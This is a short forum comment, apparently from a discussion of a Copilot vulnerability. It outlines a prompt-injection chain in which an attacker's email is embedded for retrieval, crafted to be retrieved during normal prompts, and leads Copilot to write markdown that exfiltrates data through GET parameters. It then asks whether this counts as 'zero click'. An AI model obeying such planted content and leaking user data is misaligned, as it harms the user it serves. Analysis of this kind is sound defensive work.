The way I understand it:

The attacker sends an email to the user which is intercepted by Copilot which processes the email and embeds the email for RAG. The mail is crafted to have a high likelihood to be retrieved during regular prompting. Then Copilot will write evil markdown crafted to exfiltrate data using GET parameters so the attack runs when the mail is received.

Don’t we call it a zero click when the user is compromised just from visiting a website?